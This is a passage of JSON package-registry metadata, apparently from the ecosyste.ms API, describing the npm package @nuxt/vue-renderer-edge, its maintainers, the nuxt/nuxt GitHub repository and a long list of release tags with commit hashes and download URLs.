reated_at":"2022-11-20T01:59:31.671Z","updated_at":"2022-11-20T01:59:31.671Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:39.669Z","updated_at":"2023-08-19T18:25:39.669Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096147,"name":"@nuxt/vue-renderer-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1781,"first_release_published_at":"2018-10-30T20:47:14.630Z","latest_release_published_at":"2020-06-29T00:23:20.567Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-30T23:03:22.306Z","created_at":"2022-04-08T10:39:37.833Z","updated_at":"2026-03-30T23:03:22.306Z","registry_url":"https://www.npmjs.com/package/@nuxt/vue-renderer-edge","install_command":"npm install @nuxt/vue-renderer-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url"